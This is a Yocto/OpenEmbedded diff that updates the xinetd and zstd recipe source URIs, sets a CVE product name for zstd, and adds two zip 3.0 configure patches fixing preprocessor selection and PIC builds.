"902042508b626027a3709d105f0b63ff" diff --git a/meta/recipes-extended/xinetd/xinetd_2.3.15.4.bb b/meta/recipes-extended/xinetd/xinetd_2.3.15.4.bb index 69d5b2f83b..c6d356d227 100644 --- a/meta/recipes-extended/xinetd/xinetd_2.3.15.4.bb +++ b/meta/recipes-extended/xinetd/xinetd_2.3.15.4.bb @@ -9,7 +9,7 @@ LIC_FILES_CHKSUM = "file://COPYRIGHT;md5=55c5fdf02cfcca3fc9621b6f2ceae10f" UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>\d+(\.\d+)+)" -SRC_URI = "git://github.com/openSUSE/xinetd.git;protocol=https \ +SRC_URI = "git://github.com/openSUSE/xinetd.git;protocol=https;branch=master \ file://xinetd.init \ file://xinetd.default \ file://xinetd.service \ diff --git a/meta/recipes-extended/zip/zip-3.0/0001-configure-use-correct-CPP.patch b/meta/recipes-extended/zip/zip-3.0/0001-configure-use-correct-CPP.patch new file mode 100644 index 0000000000..02253f968c --- /dev/null +++ b/meta/recipes-extended/zip/zip-3.0/0001-configure-use-correct-CPP.patch @@ -0,0 +1,47 @@ +From 7a2729ee7f5d9b9d4a0d9b83fe641a2ab03c4ee0 Mon Sep 17 00:00:00 2001 +From: Joe Slater <joe.slater@windriver.com> +Date: Thu, 24 Feb 2022 17:36:59 -0800 +Subject: [PATCH 1/2] configure: use correct CPP + +configure uses CPP to test that two assembler routines +can be built. Unfortunately, it will use /usr/bin/cpp +if it exists, invalidating the tests. We use the $CC +passed to configure. + +Upstream-Status: Inappropriate [openembedded specific] + +Signed-off-by: Joe Slater <joe.slater@windriver.com> +--- + unix/configure | 15 +++++++++------ + 1 file changed, 9 insertions(+), 6 deletions(-) + +diff --git a/unix/configure b/unix/configure +index 73ba803..7e21070 100644 +--- a/unix/configure ++++ b/unix/configure +@@ -220,13 +220,16 @@ fi + echo Check for the C preprocessor + # on SVR4, cc -E does not produce correct assembler files. Need /lib/cpp. + CPP="${CC} -E" ++ ++# We should not change CPP for yocto builds. ++# + # solaris as(1) needs -P, maybe others as well ? +-[ -f /usr/ccs/lib/cpp ] && CPP="/usr/ccs/lib/cpp -P" +-[ -f /usr/lib/cpp ] && CPP=/usr/lib/cpp +-[ -f /lib/cpp ] && CPP=/lib/cpp +-[ -f /usr/bin/cpp ] && CPP=/usr/bin/cpp +-[ -f /xenix ] && CPP="${CC} -E" +-[ -f /lynx.os ] && CPP="${CC} -E" ++# [ -f /usr/ccs/lib/cpp ] && CPP="/usr/ccs/lib/cpp -P" ++# [ -f /usr/lib/cpp ] && CPP=/usr/lib/cpp ++# [ -f /lib/cpp ] && CPP=/lib/cpp ++# [ -f /usr/bin/cpp ] && CPP=/usr/bin/cpp ++# [ -f /xenix ] && CPP="${CC} -E" ++# [ -f /lynx.os ] && CPP="${CC} -E" + + echo "#include <stdio.h>" > conftest.c + $CPP conftest.c >/dev/null 2>/dev/null || CPP="${CC} -E" +-- +2.24.1 + diff --git a/meta/recipes-extended/zip/zip-3.0/0002-configure-support-PIC-code-build.patch b/meta/recipes-extended/zip/zip-3.0/0002-configure-support-PIC-code-build.patch new file mode 100644 index 0000000000..6e0879616a --- /dev/null +++ b/meta/recipes-extended/zip/zip-3.0/0002-configure-support-PIC-code-build.patch @@ -0,0 +1,34 @@ +From b0492506d2c28581193906e9d260d4f0451e2c39 Mon Sep 17 00:00:00 2001 +From: Joe Slater <joe.slater@windriver.com> +Date: Thu, 24 Feb 2022 17:46:03 -0800 +Subject: [PATCH 2/2] configure: support PIC code build + +Disable building match.S. The code requires +relocation in .text. + +Upstream-Status: Inappropriate [openembedded specific] + +Signed-off-by: Joe Slater <joe.slater@windriver.com> +--- + unix/configure | 5 +++-- + 1 file changed, 3 insertions(+), 2 deletions(-) + +diff --git a/unix/configure b/unix/configure +index 7e21070..1bc698b 100644 +--- a/unix/configure ++++ b/unix/configure +@@ -242,8 +242,9 @@ if eval "$CPP match.S > _match.s 2>/dev/null"; then + if test ! -s _match.s || grep error < _match.s > /dev/null; then + : + elif eval "$CC -c _match.s >/dev/null 2>/dev/null" && [ -f _match.o ]; then +- CFLAGS="${CFLAGS} -DASMV" +- OBJA="match.o" ++ # disable match.S for PIC code ++ # CFLAGS="${CFLAGS} -DASMV" ++ # OBJA="match.o" + echo "int foo() { return 0;}" > conftest.c + $CC -c conftest.c >/dev/null 2>/dev/null + echo Check if compiler generates underlines +-- +2.24.1 + diff --git a/meta/recipes-extended/zip/zip_3.0.bb b/meta/recipes-extended/zip/zip_3.0.bb index 18b5d8648e..f8e0b6e259 100644 --- a/meta/recipes-extended/zip/zip_3.0.bb +++ b/meta/recipes-extended/zip/zip_3.0.bb @@ -14,6 +14,8 @@ SRC_URI = "${SOURCEFORGE_MIRROR}/infozip/Zip%203.x%20%28latest%29/3.0/zip30.tar. file://fix-security-format.patch \ file://10-remove-build-date.patch \ file://zipnote-crashes-with-segfault.patch \ + file://0001-configure-use-correct-CPP.patch \ + file://0002-configure-support-PIC-code-build.patch \ " UPSTREAM_VERSION_UNKNOWN = "1" diff --git a/meta/recipes-extended/zstd/zstd_1.4.9.bb b/meta/recipes-extended/zstd/zstd_1.4.9.bb index b86fdf8b2d..b648c84093 100644 --- a/meta/recipes-extended/zstd/zstd_1.4.9.bb +++ b/meta/recipes-extended/zstd/zstd_1.4.9.bb @@ -9,13 +9,15 @@ LICENSE = "BSD-3-Clause & GPLv2" LIC_FILES_CHKSUM = "file://LICENSE;md5=c7f0b161edbe52f5f345a3d1311d0b32 \ file://COPYING;md5=39bba7d2cf0ba1036f2a6e2be52fe3f0" -SRC_URI = "git://github.com/facebook/zstd.git;branch=release \ +SRC_URI = "git://github.com/facebook/zstd.git;branch=release;protocol=https \ file://0001-Makefile-sort-all-wildcard-file-list-expansions.patch \ " SRCREV = "e4558ffd1dc49399faf4ee5d85abed4386b4dcf5" UPSTREAM_CHECK_GITTAGREGEX = "v(?P<pver>\d+(\.\d+)+)" +CVE_PRODUCT = "zstandard" + S = "${WORKDIR}/git" PACKAGECONFIG ??= "" |